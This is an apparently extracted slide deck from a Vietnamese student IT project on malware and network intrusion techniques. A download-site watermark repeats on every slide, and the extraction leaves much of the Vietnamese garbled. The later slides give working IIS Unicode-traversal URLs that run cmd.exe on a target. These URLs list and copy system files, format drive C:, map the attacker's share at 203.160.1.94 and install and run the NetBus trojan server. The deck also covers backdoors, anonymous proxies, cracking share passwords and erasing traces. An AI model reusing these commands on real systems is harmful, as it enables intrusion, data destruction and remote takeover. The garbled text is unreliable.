BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐH DLHP BÁO CÁO ĐỒ ÁN NGÀNH CÔNG NGHỆ THÔNG TIN Đề tài: TÌM HIỂU MỘT SỐ PHẦN MỀM PHÁ HOẠI & CÁC GIẢI PHÁP XÂM NHẬP MẠNG DÙNG RIÊNG CÓ KẾT NỐI INTERNET Giáo viên hƣớng dẫn: TS Hồ Văn Canh Sinh viên : Vũ Thị Thu Hằng Lớp : CT702 LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com NỘI DUNG CHÍNH Chƣơng 1: MỘT SỐ PHƢƠNG PHÁP TẤN CƠNG VÀ KỸ THUẬT XÂM NHẬP MẠNG Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CƠNG TRÊN MẠNG Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CƠNG TRÊN MẠNG MÁY TÍNH LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Chương 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG  Thực trạng công tội phạm mạng  Các phƣơng pháp công  Các kỹ thuật xâm nhập mạng LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Thực trạng công tội phạm mạng     Phần lớn công mạng đƣợc thực thông qua việc sử dụng nhiều công cụ phần mềm Phần mềm phá hoại Các vụ công mạng ngày gia tăng quy mơ tính chất nguy hiểm Những kẻ viết virus gia tăng khả điều khiển lên virus sau phát tán chúng mạng LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Các phƣơng pháp công      Tấn công trực tiếp Nghe trộm Giả mạo địa Vơ hiệu hố chức hệ thống mục tiêu Sử dụng lỗi ngƣời quản trị hệ thống LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Các kỹ thuật xâm nhập mạng  Rình mị (Snooping)  Đánh lừa (Spoofing)  Điệp viên (Agent) LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG       Phát điểm yếu chế bảo mật đối phƣơng Triệt để lợi dụng cửa sau để công Tận dụng cơng cụ sẵn có Khai thác tối đa điểm yếu mục tiêu công, đặc biệt lỗ hổng bảo mật hệ thống dịch vụ Ngun tắc an tồn Ngun tắc phối hợp cơng LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Phát điểm yếu chế bảo mật đối phƣơng    Một hệ thống đảm bảo ANAT máy tính gồm :  Yếu tố tổ chức  Yếu tố kỹ thuật, cơng nghệ Có hai hƣớng tiếp cận để tìm lỗ hổng bảo mật:  Từ góc độ chiến thuật  Từ góc độ kỹ thuật Một số diễn đàn trao đổi lỗi bảo mật: http://packetstorm.secuify, http://www.hackerVN.net http://www.tlsecurity.net, LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Triệt để lợi dụng cửa sau để công    Việc đột nhập vào hệ thống máy tính nói chung khó khăn, sau đột nhập ngƣời ta muốn để lại cơng cụ giúp dễ dàng xâm nhập lần sau Backdoor / Trojan Nguyên tắc hoạt động Backdoor Máy công Back Giao tiếp bình thƣờng Máy đích Giao tiếp cửa sau Back Hình 3.1.1:Mơ hình hoạt động backdoor LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com Tận dụng công cụ sẵn có  Sử dụng cơng cụ để cấy Trojan lên máy khác thông qua chia sẻ tài ngun máy đó:  Cơng cụ bẻ khóa chia sẻ Passware Kit (http://www.LostPassword.com)  Copy file server Netbus 1.7 (patch.exe) vào thƣ mục ổ C:  Sử dụng regedit.exe Windows để nạp sửa đổi Registry máy (Remote Registry Service) LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 10 Khai thác tối đa điểm yếu mục tiêu công, đặc biệt lỗ hổng bảo mật hệ thống dịch vụ  Khi thực thi, xâu “%c1%1c” đƣợc dịch trở lại nguyên dạng ký tự “/” http://www.iisaffected.com/scripts/ / /winnt/system32/cm d.exe?/c+dir+c:\  Để xem nội dung file autoexec.bat: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+type+c:\autoexec bat  Để format lại ổ đĩa C: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+format+c:\+/q LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 13 Khai thác tối đa điểm yếu mục tiêu công, đặc biệt lỗ hổng bảo mật hệ thống dịch vụ  Cũng chiếm quyền ghi đĩa thực sửa đổi, tạo file server: + Bƣớc 1: Tạo cmd1.exe trình thơng dịch lệnh DOS: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/win nt/system32/cmd1.exe + Bƣớc 2: Ghi thêm số lệnh vào file autoexec.bat: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+echo+>>+c:\autoexec.bat+@echo+Hihi LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 14 Ngun tắc an tồn  Sử dụng procxy vơ danh (Anonymous Proxy Server) Gửi yêu cầu Máy ta Proxy Máy đối Gửi yêu cầu phƣơng Trả lời Trả lời Hình 3.5.1: Mơ hình giao tiếp hai máy thơng qua proxy   Để ln có thơng tin proxy miễn phí, thƣờng xun truy cập trang web http://www.blackcode.com, http://www.freeproxies.com Sử dụng số chƣơng trình nhằm tạo proxy ảo máy mình, nhƣ Anomity proxy LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 15 Nguyên tắc phối hợp công Ngụy trang Khám phá điểm yếu, lỗ hổng bảo mật hệ thống mục tiêu Sử dụng công cụ để khai thác điểm yếu hệ thống mục tiêu Tiến hành biện pháp công, thu thập thông tin Tạo đƣờng ngầm (cửa sau), cài cắm “điệp viên” Xóa dấu vết Hình 3.6.1: Sơ đồ thứ tự áp dụng nguyên lý công LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 16 Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU  NETBUS LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 17 Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU  WS_Ping ProPack (http://www.ipswitch.com) LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 18 Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CƠNG TRÊN MẠNG MÁY TÍNH   Tấn công máy mục tiêu cách giành quyền điều khiển hệ thống  HTTP (HypeTtext Transfer Protocol – giao thức truyền siêu văn bản)  Giao thức TFTP (Trivial File Transfer Protocol – giao thức truyền file đơn giản)  Giao thức NetBIOS (Network Basic Input/Output System) Kết hợp công cụ quét tài nguyên đƣợc chia sẻ công cụ bẻ mật LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 19 Cách download upload file IIS mắc lỗi Unicode  Khi cài IIS phiên từ 4.0 trở lên, FTP server cho phép user truy cập vào thƣ mục \inetpub\ftoproot\ download file từ đó: + Bƣớc 1: Copy file download (giả sử file c:\system.ini) vào thƣ mục \inetpub\ftoproot\ URL: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftoproot\ + Bƣớc 2: Sử dụng FTP vô danh đăng nhập vào máy tính đích download file system.ini LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 20 Cách download upload file IIS mắc lỗi Unicode   Hạn chế: khơng cho phép download tất file Windows NT Windows 2000 lƣu trữ file SAM (Security Account Manager) thƣ mục \WINNT\repair\, lƣu trữ thông tin account sử dụng hệ thống đƣợc mã hóa LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 21 Cách download upload file IIS mắc lỗi Unicode   Bƣớc 1: Chia sẻ ổ đĩa máy mình, ổ C: , với quyền truy nhập “Full” khơng có pass bảo vệ.Tên chia sẻ (Share name) đƣợc đặt “My Disk” Bƣớc 2: Sử dụng lệnh “net use” IIS để ánh xạ (map) “My Disk” (tức ổ đĩa C: máy mình) thành ổ đĩa máy chủ phía đích, ổ G: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+net +use+G:+\\203.160.1.94\MyDisk LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 22 Cách download upload file IIS mắc lỗi Unicode  Bƣớc 3: Ngƣời ta cần tìm chƣơng trình điều khiển máy tính, chép vào ổ C: (ổ G:\ máy đích) dùng trình duyệt copy lên đĩa cứng thực server Trên ổ C: ngƣời ta có Trojan netbus 1.7 với thành phần server Patch.exe, ngƣời ta thực lệnh sau trình duyệt: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+copy+g:\Patch.exe+c:\Patch.exe LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 23 Cách download upload file IIS mắc lỗi Unicode  Bƣớc 4: Dùng lệnh “net use G:/delete” server để ngắt liên kết đến ổ C: mình: http://www.iisaffected.com/scripts/ %c1%1c /winnt/syste m32/cmd.exe?/c+net+use+g:+\delete Bỏ việc “share” ổ đĩa C: để đảm bảo an toàn  Bƣớc 5: Chạy thành phần server chƣơng trình điều khiển từ xa máy đích thành phần client máy ta, kết nối vào điều khiển máy đích LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 24 Kết hợp công cụ quét tài nguyên đƣợc chia sẻ công cụ bẻ mật      Để quét tài nguyên đƣợc chia sẻ máy mục tiêu, dùng phần mềm WS_Ping ProPack với công cụ Scan Để truy cập đến tài nguyên đó: Run\\\ Để xem tài nguyên có share hay không sử dụng câu lệnh C:\net view Nếu tài nguyên đƣợc chia sẻ mật truy nhập : net use : LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 25 Kết hợp công cụ quét tài nguyên đƣợc chia sẻ công cụ bẻ mật  Nếu tài nguyên đƣợc chia sẻ với mật ta dùng cơng cụ bẻ mật khẩu, truy nhập đến tài nguyên theo mật bẻ đƣợc - Passware Kit LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 26 KẾT LUẬN   Mặc dù có nhiều cố gắng nhƣng Internet vấn để vơ rộng, thời gian ngắn trình độ có hạn nên đồ án nhiều hạn chế chƣa giải trọn vẹn yêu cầu đề tài nêu Hƣớng phát triển đề tài em khắc phục hạn chế để đề tài ngày hoàn thiện tạo sản phẩm phần mềm - công cụ ứng dụng công nghệ xâm nhập mạng nói riêng cơng nghệ thơng tin nói chung Em xin chân thành cảm ơn ! LUAN VAN CHAT LUONG download : add luanvanchat@agmail.com 27 ... 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CƠNG TRÊN MẠNG... luanvanchat@agmail.com Chương 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG  Thực trạng công tội phạm mạng  Các phƣơng pháp công  Các kỹ thuật xâm nhập mạng LUAN VAN CHAT LUONG download... luanvanchat@agmail.com Thực trạng công tội phạm mạng     Phần lớn công mạng đƣợc thực thông qua việc sử dụng nhiều công cụ phần mềm Phần mềm phá hoại Các vụ công mạng ngày gia tăng quy mô tính chất nguy